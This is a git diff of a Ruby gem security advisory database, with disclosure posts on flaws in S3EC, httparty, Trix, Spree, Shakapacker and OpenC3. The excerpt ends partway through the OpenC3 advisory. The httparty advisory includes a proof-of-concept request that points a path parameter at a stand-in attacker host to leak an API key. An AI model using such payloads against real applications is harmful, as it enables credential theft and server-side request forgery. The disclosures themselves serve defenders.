+    S3 Encryption Client for Ruby is an open-source client-side encryption
+    library used to facilitate writing and reading encrypted records to S3.
+
+    When the encrypted data key (EDK) is stored in an "Instruction File"
+    instead of S3's metadata record, the EDK is exposed to an "Invisible
+    Salamanders" attack (https://eprint.iacr.org/2019/016), which could
+    allow the EDK to be replaced with a new key.
+
+    ## Impact
+
+    ### Background - Key Commitment
+
+    There is a cryptographic property whereby under certain conditions,
+    a single ciphertext can be decrypted into 2 different plaintexts by
+    using different encryption keys. To address this issue, strong
+    encryption schemes use what is known as "key commitment", a process
+    by which an encrypted message can only be decrypted by one key;
+    the key used to originally encrypt the message.
+
+    In older versions of S3EC, when customers are also using a feature
+    called "Instruction File" to store EDKs, key commitment is not
+    implemented because multiple EDKs could be associated to an underlying
+    encrypted message object.  For such customers an attack that leverages
+    the lack of key commitment is possible.  A bad actor would need two
+    things to leverage this issue:
+      (i) the ability to create a separate, rogue, EDK that will also
+           decrypt the underlying object to produce desired plaintext, and
+      (ii) permission to upload a new instruction file to the S3 bucket
+           to replace the existing instruction file placed there by the
+           user using the S3C.  Any future attempt to decrypt the
+           underlying encrypted message with the S3EC will unwittingly
+           use the rogue EDK to produce a valid plaintext message.
+
+    ### Impacted versions: <= 1.207.0
+
+    ## Patches
+
+    We are introducing the concept of "key commitment\" to S3EC where the
+    EDK is cryptographically bound to the ciphertext in order to address
+    this issue.  In order to maintain compatibility for in-flight messages
+    we are releasing the fix in two versions. A code-compatible minor
+    version that can read messages with key-commitment but not write them,
+    and a new major version that can both read and write messages with
+    key-commitment. For maximum safety customers are asked to upgrade to
+    the latest major version: 1.208.0 or later.
+
+    ### Workarounds
+
+    There are no workarounds, please upgrade to the suggested version of S3EC.
+
+    ### References
+
+    If customers have any questions or comments about this advisory,
+    AWS SDK for Ruby asks that they contact AWS Security via the issue
+    reporting page or directly via email  to
+    [aws-security@amazon.com](mailto:aws-security@amazon.com).
+    Please do not create a public GitHub issue.
+  cvss_v3: 5.3
+  cvss_v4: 6.0
+  patched_versions:
+  - ">= 1.208.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14762
+    - https://rubygems.org/gems/aws-sdk-s3/versions/1.208.0
+    - https://github.com/aws/aws-sdk-ruby/security/advisories/GHSA-2xgq-q749-89fq
+    - https://github.com/aws/aws-sdk-ruby/commit/b633ba10cd2fbc4cc770b76ab531ed9647654044
+    - https://aws.amazon.com/security/security-bulletins/AWS-2025-032
+    - https://github.com/advisories/GHSA-2xgq-q749-89fq
+---
diff --git a/advisories/_posts/2025-12-23-CVE-2025-68696.md b/advisories/_posts/2025-12-23-CVE-2025-68696.md
index bdc23e3c..233e1ff3 100644
--- a/advisories/_posts/2025-12-23-CVE-2025-68696.md
+++ b/advisories/_posts/2025-12-23-CVE-2025-68696.md
@@ -1,118 +1,118 @@
----
-layout: advisory
-title: 'CVE-2025-68696 (httparty): httparty Has Potential SSRF Vulnerability That
-  Leads to API Key Leakage'
-comments: false
-categories:
-- httparty
-advisory:
-  gem: httparty
-  cve: 2025-68696
-  ghsa: hm5p-x4rq-38w4
-  url: https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
-  title: httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage
-  date: 2025-12-23
-  description: |
-    ## Summary
-
-    There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.
-
-    ## Details
-
-    When httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.
-
-    Consider the following example of a web application:
-
-    ```rb
-    require 'sinatra'
-    require 'httparty'
-
-    class RepositoryClient
-      include HTTParty
-      base_uri 'http://exmaple.test/api/v1/repositories/'
-      headers 'X-API-KEY' => '1234567890'
-    end
-
-    post '/issue' do
-      request_body = JSON.parse(request.body.read)
-      RepositoryClient.get(request_body['repository_id']).body
-      # do something
-      json message: 'OK'
-    end
-    ```
-
-    Now, suppose an attacker sends a request like this:
-
-    ```
-    POST /issue HTTP/1.1
-    Host: localhost:10000
-    Content-Type: application/json
-
-    {
-        "repository_id": "http://attacker.test",
-        "title": "test"
-    }
-    ```
-
-    In this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.
-
-    A similar problem was reported and fixed in the HTTP client library axios in the past:
-    <https://github.com/axios/axios/issues/6463>
-
-    Also, Python's `urljoin` function has documented a warning about similar behavior:
-    <https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin>
-
-    ## PoC
-
-    Follow these steps to reproduce the issue:
-
-    1. Set up two simple HTTP servers.
-
-       ```bash
-       mkdir /tmp/server1 /tmp/server2
-       echo "this is server1" > /tmp/server1/index.html
-       echo "this is server2" > /tmp/server2/index.html
-       python -m http.server -d /tmp/server1 10001 &
-       python -m http.server -d /tmp/server2 10002 &
-       ```
-
-    2. Create a script (for example, `main.rb`):
-
-       ```rb
-       require 'httparty'
-
-       class Client
-         include HTTParty
-         base_uri 'http://localhost:10001'
-       end
-
-       data = Client.get('http://localhost:10002').body
-       puts data
-       ```
-
-    3. Run the script:
-
-       ```bash
-       $ ruby main.rb
-       this is server2
-       ```
-
-    Although `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.
-
-
-    ## Impact
-
-    - Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
-    - SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
-    - Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.
-  cvss_v3: 8.2
-  cvss_v4: 8.8
-  patched_versions:
-  - ">= 0.24.0"
-  related:
-    url:
-    - https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
-    - https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-68696
-    - https://github.com/advisories/GHSA-hm5p-x4rq-38w4
----
+---
+layout: advisory
+title: 'CVE-2025-68696 (httparty): httparty Has Potential SSRF Vulnerability That
+  Leads to API Key Leakage'
+comments: false
+categories:
+- httparty
+advisory:
+  gem: httparty
+  cve: 2025-68696
+  ghsa: hm5p-x4rq-38w4
+  url: https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
+  title: httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage
+  date: 2025-12-23
+  description: |
+    ## Summary
+
+    There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.
+
+    ## Details
+
+    When httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.
+
+    Consider the following example of a web application:
+
+    ```rb
+    require 'sinatra'
+    require 'httparty'
+
+    class RepositoryClient
+      include HTTParty
+      base_uri 'http://exmaple.test/api/v1/repositories/'
+      headers 'X-API-KEY' => '1234567890'
+    end
+
+    post '/issue' do
+      request_body = JSON.parse(request.body.read)
+      RepositoryClient.get(request_body['repository_id']).body
+      # do something
+      json message: 'OK'
+    end
+    ```
+
+    Now, suppose an attacker sends a request like this:
+
+    ```
+    POST /issue HTTP/1.1
+    Host: localhost:10000
+    Content-Type: application/json
+
+    {
+        "repository_id": "http://attacker.test",
+        "title": "test"
+    }
+    ```
+
+    In this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.
+
+    A similar problem was reported and fixed in the HTTP client library axios in the past:
+    <https://github.com/axios/axios/issues/6463>
+
+    Also, Python's `urljoin` function has documented a warning about similar behavior:
+    <https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin>
+
+    ## PoC
+
+    Follow these steps to reproduce the issue:
+
+    1. Set up two simple HTTP servers.
+
+       ```bash
+       mkdir /tmp/server1 /tmp/server2
+       echo "this is server1" > /tmp/server1/index.html
+       echo "this is server2" > /tmp/server2/index.html
+       python -m http.server -d /tmp/server1 10001 &
+       python -m http.server -d /tmp/server2 10002 &
+       ```
+
+    2. Create a script (for example, `main.rb`):
+
+       ```rb
+       require 'httparty'
+
+       class Client
+         include HTTParty
+         base_uri 'http://localhost:10001'
+       end
+
+       data = Client.get('http://localhost:10002').body
+       puts data
+       ```
+
+    3. Run the script:
+
+       ```bash
+       $ ruby main.rb
+       this is server2
+       ```
+
+    Although `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.
+
+
+    ## Impact
+
+    - Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
+    - SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
+    - Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.
+  cvss_v3: 8.2
+  cvss_v4: 8.8
+  patched_versions:
+  - ">= 0.24.0"
+  related:
+    url:
+    - https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
+    - https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-68696
+    - https://github.com/advisories/GHSA-hm5p-x4rq-38w4
+---
diff --git a/advisories/_posts/2025-12-31-GHSA-g9jg-w8vm-g96v.md b/advisories/_posts/2025-12-31-GHSA-g9jg-w8vm-g96v.md
index ab6c3cee..e8bce5d7 100644
--- a/advisories/_posts/2025-12-31-GHSA-g9jg-w8vm-g96v.md
+++ b/advisories/_posts/2025-12-31-GHSA-g9jg-w8vm-g96v.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'GHSA-g9jg-w8vm-g96v (action_text-trix): Trix has a stored XSS vulnerability
-  through its attachment attribute'
-comments: false
-categories:
-- action_text-trix
-advisory:
-  gem: action_text-trix
-  ghsa: g9jg-w8vm-g96v
-  url: https://github.com/basecamp/trix/security/advisories/GHSA-g9jg-w8vm-g96v
-  title: Trix has a stored XSS vulnerability through its attachment attribute
-  date: 2025-12-31
-  description: |
-    ### Impact
-
-    The Trix editor, in versions prior to 2.1.16, is vulnerable to XSS
-    attacks through attachment payloads.
-
-    An attacker could inject malicious code into a data-trix-attachment
-    attribute that, when rendered as HTML and clicked on, could execute
-    arbitrary JavaScript code within the context of the user's session,
-    potentially leading to unauthorized actions being performed or
-    sensitive information being disclosed.
-
-    ### Patches
-
-    Update Recommendation: Users should upgrade to Trix editor
-    version 2.1.16 or later.
-
-    ### Resources
-
-    The XSS vulnerability was reported by HackerOne researcher
-    [michaelcheers](https://hackerone.com/michaelcheers?type=user).
-  cvss_v3: 4.6
-  patched_versions:
-  - ">= 2.1.16"
-  related:
-    url:
-    - https://github.com/basecamp/trix/security/advisories/GHSA-g9jg-w8vm-g96v
-    - https://github.com/basecamp/trix/releases/tag/v2.1.16
-    - https://github.com/basecamp/trix/commit/73c20cf03ab2b56c0ef9c9b1aaf63f2de44f4010
-    - https://github.com/advisories/GHSA-g9jg-w8vm-g96v
----
+---
+layout: advisory
+title: 'GHSA-g9jg-w8vm-g96v (action_text-trix): Trix has a stored XSS vulnerability
+  through its attachment attribute'
+comments: false
+categories:
+- action_text-trix
+advisory:
+  gem: action_text-trix
+  ghsa: g9jg-w8vm-g96v
+  url: https://github.com/basecamp/trix/security/advisories/GHSA-g9jg-w8vm-g96v
+  title: Trix has a stored XSS vulnerability through its attachment attribute
+  date: 2025-12-31
+  description: |
+    ### Impact
+
+    The Trix editor, in versions prior to 2.1.16, is vulnerable to XSS
+    attacks through attachment payloads.
+
+    An attacker could inject malicious code into a data-trix-attachment
+    attribute that, when rendered as HTML and clicked on, could execute
+    arbitrary JavaScript code within the context of the user's session,
+    potentially leading to unauthorized actions being performed or
+    sensitive information being disclosed.
+
+    ### Patches
+
+    Update Recommendation: Users should upgrade to Trix editor
+    version 2.1.16 or later.
+
+    ### Resources
+
+    The XSS vulnerability was reported by HackerOne researcher
+    [michaelcheers](https://hackerone.com/michaelcheers?type=user).
+  cvss_v3: 4.6
+  patched_versions:
+  - ">= 2.1.16"
+  related:
+    url:
+    - https://github.com/basecamp/trix/security/advisories/GHSA-g9jg-w8vm-g96v
+    - https://github.com/basecamp/trix/releases/tag/v2.1.16
+    - https://github.com/basecamp/trix/commit/73c20cf03ab2b56c0ef9c9b1aaf63f2de44f4010
+    - https://github.com/advisories/GHSA-g9jg-w8vm-g96v
+---
diff --git a/advisories/_posts/2026-01-08-CVE-2026-22588.md b/advisories/_posts/2026-01-08-CVE-2026-22588.md
index f37a2725..dd52372e 100644
--- a/advisories/_posts/2026-01-08-CVE-2026-22588.md
+++ b/advisories/_posts/2026-01-08-CVE-2026-22588.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2026-22588 (spree_api): Spree API has Authenticated Insecure Direct Object
-  Reference (IDOR) via Order Modification'
-comments: false
-categories:
-- spree_api
-advisory:
-  gem: spree_api
-  cve: 2026-22588
-  ghsa: g268-72p7-9j6j
-  url: https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j
-  title: Spree API has Authenticated Insecure Direct Object Reference (IDOR) via Order
-    Modification
-  date: 2026-01-08
-  description: |
-    ### Summary
-
-    An Authenticated Insecure Direct Object Reference (IDOR)
-    vulnerability was identified that allows an authenticated user to
-    retrieve other users’ address information by modifying an existing order.
-    By editing an order they legitimately own and manipulating address
-    identifiers in the request, the backend server accepts and processes
-    references to addresses belonging to other users, subsequently
-    associating those addresses with the attacker’s order and returning
-    them in the response.
-
-    ### Details
-
-    Affected Component(s)
-
-    - Authenticated user order management
-    - Address association logic
-    - Order update endpoint(s)
-
-    Affected Endpoint(s):
-    - `/api/v2/storefront/checkout`
-
-    The application fails to enforce proper object-level authorization
-    when updating an existing order. While the user is authenticated and
-    authorized to modify their own order, the backend does not verify
-    that the supplied address identifiers belong to the same authenticated user.
-
-    **See reference below for POC.**
-
-    ### Impact
-
-    As a result, an attacker can:
-    - Replace the address identifier with one belonging to another user
-    - Cause the backend to associate and return another user’s address
-      within the attacker’s order"
-  cvss_v3: 6.5
-  unaffected_versions:
-  - "< 3.7.0"
-  patched_versions:
-  - "~> 4.10.2"
-  - "~> 5.0.7"
-  - "~> 5.1.9"
-  - ">= 5.2.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-22588
-    - https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j
-    - https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72
-    - https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3
-    - https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8
-    - https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7
-    - https://github.com/advisories/GHSA-g268-72p7-9j6j
----
+---
+layout: advisory
+title: 'CVE-2026-22588 (spree_api): Spree API has Authenticated Insecure Direct Object
+  Reference (IDOR) via Order Modification'
+comments: false
+categories:
+- spree_api
+advisory:
+  gem: spree_api
+  cve: 2026-22588
+  ghsa: g268-72p7-9j6j
+  url: https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j
+  title: Spree API has Authenticated Insecure Direct Object Reference (IDOR) via Order
+    Modification
+  date: 2026-01-08
+  description: |
+    ### Summary
+
+    An Authenticated Insecure Direct Object Reference (IDOR)
+    vulnerability was identified that allows an authenticated user to
+    retrieve other users’ address information by modifying an existing order.
+    By editing an order they legitimately own and manipulating address
+    identifiers in the request, the backend server accepts and processes
+    references to addresses belonging to other users, subsequently
+    associating those addresses with the attacker’s order and returning
+    them in the response.
+
+    ### Details
+
+    Affected Component(s)
+
+    - Authenticated user order management
+    - Address association logic
+    - Order update endpoint(s)
+
+    Affected Endpoint(s):
+    - `/api/v2/storefront/checkout`
+
+    The application fails to enforce proper object-level authorization
+    when updating an existing order. While the user is authenticated and
+    authorized to modify their own order, the backend does not verify
+    that the supplied address identifiers belong to the same authenticated user.
+
+    **See reference below for POC.**
+
+    ### Impact
+
+    As a result, an attacker can:
+    - Replace the address identifier with one belonging to another user
+    - Cause the backend to associate and return another user’s address
+      within the attacker’s order"
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 3.7.0"
+  patched_versions:
+  - "~> 4.10.2"
+  - "~> 5.0.7"
+  - "~> 5.1.9"
+  - ">= 5.2.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-22588
+    - https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j
+    - https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72
+    - https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3
+    - https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8
+    - https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7
+    - https://github.com/advisories/GHSA-g268-72p7-9j6j
+---
diff --git a/advisories/_posts/2026-01-08-CVE-2026-22589.md b/advisories/_posts/2026-01-08-CVE-2026-22589.md
index 1cd4c2c6..457acae8 100644
--- a/advisories/_posts/2026-01-08-CVE-2026-22589.md
+++ b/advisories/_posts/2026-01-08-CVE-2026-22589.md
@@ -1,82 +1,82 @@
----
-layout: advisory
-title: 'CVE-2026-22589 (spree_core): Spree API has Unauthenticated IDOR - Guest Address'
-comments: false
-categories:
-- spree_core
-advisory:
-  gem: spree_core
-  cve: 2026-22589
-  ghsa: 3ghg-3787-w2xr
-  url: https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
-  title: Spree API has Unauthenticated IDOR - Guest Address
-  date: 2026-01-08
-  description: |
-    ### Summary
-
-    An Unauthenticated Insecure Direct Object Reference (IDOR)
-    vulnerability was identified that allows an unauthenticated attacker
-    to access guest address information without supplying valid
-    credentials or session cookies.
-
-    ###  Details
-
-    During testing, it was observed that all guest users can make an
-    unauthenticated request to retrieve address data belonging to other
-    guest users by manipulating object identifiers. The attacker would
-    need to know the storefront URL structure to perform this attack
-    (which can be learnt after creating a registered user account).
-
-    Affected Component(s)
-
-    * Address Edit endpoint: `/addresses/{addressId}/edit`
-
-    Root Cause
-    - Faulty authorization check in CanCanCan Ability class:
-
-    ```diff
-    - can :manage,  ::Spree::Address, user_id: user.id
-    + can :manage, ::Spree::Address, user_id: user.id if user.persisted?
-    ```
-
-    the `user` object in `Spree::Ability` class for guest users is
-    a `Spree.user_class.new` object.
-
-    Addresses endpoint to access it is part of the `spree_storefront`
-    gem. **Headless builds using APIs are not affected,** as the
-    Addresses endpoint there is only for registered users, and
-    records are scoped to the currently signed-in user.
-
-    ### Impact
-
-    An unauthenticated attacker can:
-
-    - Enumerate and retrieve guest address information (Addresses
-      associated with User accounts are NOT affected)
-    - Access personally identifiable information (PII) such as:
-    - Full names
-    - Physical addresses
-    - Phone numbers (if present)
-
-    This vulnerability could lead to:
-
-    - Privacy violations
-    - Regulatory compliance issues (e.g., GDPR)
-    - Loss of user trust"
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "~> 4.10.2"
-  - "~> 5.0.7"
-  - "~> 5.1.9"
-  - ">= 5.2.5"
-  related:
-    url:
-    - https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
-    - https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795
-    - https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad
-    - https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67
-    - https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad
-    - https://github.com/advisories/GHSA-3ghg-3787-w2xr
----
+---
+layout: advisory
+title: 'CVE-2026-22589 (spree_core): Spree API has Unauthenticated IDOR - Guest Address'
+comments: false
+categories:
+- spree_core
+advisory:
+  gem: spree_core
+  cve: 2026-22589
+  ghsa: 3ghg-3787-w2xr
+  url: https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
+  title: Spree API has Unauthenticated IDOR - Guest Address
+  date: 2026-01-08
+  description: |
+    ### Summary
+
+    An Unauthenticated Insecure Direct Object Reference (IDOR)
+    vulnerability was identified that allows an unauthenticated attacker
+    to access guest address information without supplying valid
+    credentials or session cookies.
+
+    ###  Details
+
+    During testing, it was observed that all guest users can make an
+    unauthenticated request to retrieve address data belonging to other
+    guest users by manipulating object identifiers. The attacker would
+    need to know the storefront URL structure to perform this attack
+    (which can be learnt after creating a registered user account).
+
+    Affected Component(s)
+
+    * Address Edit endpoint: `/addresses/{addressId}/edit`
+
+    Root Cause
+    - Faulty authorization check in CanCanCan Ability class:
+
+    ```diff
+    - can :manage,  ::Spree::Address, user_id: user.id
+    + can :manage, ::Spree::Address, user_id: user.id if user.persisted?
+    ```
+
+    the `user` object in `Spree::Ability` class for guest users is
+    a `Spree.user_class.new` object.
+
+    Addresses endpoint to access it is part of the `spree_storefront`
+    gem. **Headless builds using APIs are not affected,** as the
+    Addresses endpoint there is only for registered users, and
+    records are scoped to the currently signed-in user.
+
+    ### Impact
+
+    An unauthenticated attacker can:
+
+    - Enumerate and retrieve guest address information (Addresses
+      associated with User accounts are NOT affected)
+    - Access personally identifiable information (PII) such as:
+    - Full names
+    - Physical addresses
+    - Phone numbers (if present)
+
+    This vulnerability could lead to:
+
+    - Privacy violations
+    - Regulatory compliance issues (e.g., GDPR)
+    - Loss of user trust"
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 4.10.2"
+  - "~> 5.0.7"
+  - "~> 5.1.9"
+  - ">= 5.2.5"
+  related:
+    url:
+    - https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
+    - https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795
+    - https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad
+    - https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67
+    - https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad
+    - https://github.com/advisories/GHSA-3ghg-3787-w2xr
+---
diff --git a/advisories/_posts/2026-01-08-GHSA-96qw-h329-v5rg.md b/advisories/_posts/2026-01-08-GHSA-96qw-h329-v5rg.md
index 5d8aca13..48f8a731 100644
--- a/advisories/_posts/2026-01-08-GHSA-96qw-h329-v5rg.md
+++ b/advisories/_posts/2026-01-08-GHSA-96qw-h329-v5rg.md
@@ -1,99 +1,99 @@
----
-layout: advisory
-title: 'GHSA-96qw-h329-v5rg (shakapacker): Shakapacker has environment variable leak
-  via EnvironmentPlugin that exposes secrets to client-side bundles'
-comments: false
-categories:
-- shakapacker
-advisory:
-  gem: shakapacker
-  ghsa: 96qw-h329-v5rg
-  url: https://github.com/shakacode/shakapacker/security/advisories/GHSA-96qw-h329-v5rg
-  title: Shakapacker has environment variable leak via EnvironmentPlugin that exposes
-    secrets to client-side bundles
-  date: 2026-01-08
-  description: |
-    ### Summary
-
-    Since 2017, the default webpack plugins have passed the entire
-    `process.env` to `EnvironmentPlugin`. This pattern exposed ALL
-    build environment variables to client-side JavaScript bundles
-    whenever application code (or any dependency) referenced
-    `process.env.VARIABLE_NAME`.
-
-    This is not a regression - the vulnerable code has existed since
-    the original Webpacker implementation. No recent code change
-    in Shakapacker triggered this issue.
-
-    ### Impact
-
-    Any environment variable in the build environment that is referenced
-    in client-side code (including third-party dependencies) is embedded
-    directly into the JavaScript bundle. This includes:
-
-    - `DATABASE_URL` - Database credentials
-    - `AWS_SECRET_ACCESS_KEY` - AWS credentials
-    - `RAILS_MASTER_KEY` - Rails encrypted credentials key
-    - `STRIPE_SECRET_KEY`, `TWILIO_AUTH_TOKEN` - Third-party API keys
-    - Any other secrets present in the build environment
-
-    **Severity**: Critical - secrets are exposed in publicly accessible
-    JavaScript files.
-
-    ### Root Cause
-
-    The original code used:
-    ```javascript
-    new
-    webpack.EnvironmentPlugin(process.env)
-    ```
-
-    This makes every environment variable available for substitution. If
-    any code references `process.env.SECRET_KEY`, that value is embedded
-    in the bundle.
-
-    ### Patches
-
-    Upgrade to version 9.5.0 or later, which uses an allowlist approach
-    that only exposes `NODE_ENV`, `RAILS_ENV`, and `WEBPACK_SERVE` by default.
-
-    ### Workarounds
-
-    If developers cannot upgrade immediately:
-      1. Audit client-side code and dependencies for any `process.env.X`
-         references to sensitive variables
-      2. Remove sensitive variables from the build environment
-      3. Override the default plugins with a custom webpack/rspack
-         config using an explicit allowlist
-
-    ### Migration
-
-    After upgrading, if client-side code needs access to specific environment
-    variables:
-
-    **Option 1: Use the `SHAKAPACKER_PUBLIC_` prefix (recommended)**
-    ```bash
-    # Variables with this prefix are automatically exposed
-    export SHAKAPACKER_PUBLIC_API_URL=\"https://api.example.com\"
-    ```
-
-    **Option 2: Use `SHAKAPACKER_ENV_VARS`**
-    ```bash
-    SHAKAPACKER_ENV_VARS=API_URL,FEATURE_FLAG
-    bundle exec rails assets:precompile
-    ```
-
-    ### Action Required
-
-    After upgrading, **rotate any secrets** that may have been exposed
-    in previously compiled JavaScript bundles.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 9.5.0"
-  related:
-    url:
-    - https://github.com/shakacode/shakapacker/security/advisories/GHSA-96qw-h329-v5rg
-    - https://github.com/shakacode/shakapacker/pull/857
-    - https://github.com/shakacode/shakapacker/commit/3e06781b18383c5c2857ed3a722f7b91bdc1bc0e
-    - https://github.com/advisories/GHSA-96qw-h329-v5rg
----
+---
+layout: advisory
+title: 'GHSA-96qw-h329-v5rg (shakapacker): Shakapacker has environment variable leak
+  via EnvironmentPlugin that exposes secrets to client-side bundles'
+comments: false
+categories:
+- shakapacker
+advisory:
+  gem: shakapacker
+  ghsa: 96qw-h329-v5rg
+  url: https://github.com/shakacode/shakapacker/security/advisories/GHSA-96qw-h329-v5rg
+  title: Shakapacker has environment variable leak via EnvironmentPlugin that exposes
+    secrets to client-side bundles
+  date: 2026-01-08
+  description: |
+    ### Summary
+
+    Since 2017, the default webpack plugins have passed the entire
+    `process.env` to `EnvironmentPlugin`. This pattern exposed ALL
+    build environment variables to client-side JavaScript bundles
+    whenever application code (or any dependency) referenced
+    `process.env.VARIABLE_NAME`.
+
+    This is not a regression - the vulnerable code has existed since
+    the original Webpacker implementation. No recent code change
+    in Shakapacker triggered this issue.
+
+    ### Impact
+
+    Any environment variable in the build environment that is referenced
+    in client-side code (including third-party dependencies) is embedded
+    directly into the JavaScript bundle. This includes:
+
+    - `DATABASE_URL` - Database credentials
+    - `AWS_SECRET_ACCESS_KEY` - AWS credentials
+    - `RAILS_MASTER_KEY` - Rails encrypted credentials key
+    - `STRIPE_SECRET_KEY`, `TWILIO_AUTH_TOKEN` - Third-party API keys
+    - Any other secrets present in the build environment
+
+    **Severity**: Critical - secrets are exposed in publicly accessible
+    JavaScript files.
+
+    ### Root Cause
+
+    The original code used:
+    ```javascript
+    new
+    webpack.EnvironmentPlugin(process.env)
+    ```
+
+    This makes every environment variable available for substitution. If
+    any code references `process.env.SECRET_KEY`, that value is embedded
+    in the bundle.
+
+    ### Patches
+
+    Upgrade to version 9.5.0 or later, which uses an allowlist approach
+    that only exposes `NODE_ENV`, `RAILS_ENV`, and `WEBPACK_SERVE` by default.
+
+    ### Workarounds
+
+    If developers cannot upgrade immediately:
+      1. Audit client-side code and dependencies for any `process.env.X`
+         references to sensitive variables
+      2. Remove sensitive variables from the build environment
+      3. Override the default plugins with a custom webpack/rspack
+         config using an explicit allowlist
+
+    ### Migration
+
+    After upgrading, if client-side code needs access to specific environment
+    variables:
+
+    **Option 1: Use the `SHAKAPACKER_PUBLIC_` prefix (recommended)**
+    ```bash
+    # Variables with this prefix are automatically exposed
+    export SHAKAPACKER_PUBLIC_API_URL=\"https://api.example.com\"
+    ```
+
+    **Option 2: Use `SHAKAPACKER_ENV_VARS`**
+    ```bash
+    SHAKAPACKER_ENV_VARS=API_URL,FEATURE_FLAG
+    bundle exec rails assets:precompile
+    ```
+
+    ### Action Required
+
+    After upgrading, **rotate any secrets** that may have been exposed
+    in previously compiled JavaScript bundles.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 9.5.0"
+  related:
+    url:
+    - https://github.com/shakacode/shakapacker/security/advisories/GHSA-96qw-h329-v5rg
+    - https://github.com/shakacode/shakapacker/pull/857
+    - https://github.com/shakacode/shakapacker/commit/3e06781b18383c5c2857ed3a722f7b91bdc1bc0e
+    - https://github.com/advisories/GHSA-96qw-h329-v5rg
+---
diff --git a/advisories/_posts/2026-01-13-CVE-2025-68271.md b/advisories/_posts/2026-01-13-CVE-2025-68271.md
index 95eb5c01..2515ec51 100644
--- a/advisories/_posts/2026-01-13-CVE-2025-68271.md
+++ b/advisories/_posts/2026-01-13-CVE-2025-68271.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2025-68271 (openc3): openc3-api Vulnerable to Unauthenticated Remote Code
-  Execution'
-comments: false
-categories:
-- openc3
-advisory:
-  gem: openc3
-  cve: 2025-68271
-  ghsa: w757-4qv9-mghp
-  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-w757-4qv9-mghp
-  title: openc3-api Vulnerable to Unauthenticated Remote Code Execution
-  date: 2026-01-13
-  description: |
-    ### Summary
-
-    OpenC3 COSMOS contains a critical remote code execution vulnerability
-    reachable through the JSON-RPC API. When a JSON-RPC request uses the
-    string form of certain APIs, attacker-controlled parameter text is
-    parsed into values using String#convert_to_value. For array-like
-    inputs, convert_to_value executes eval().
-
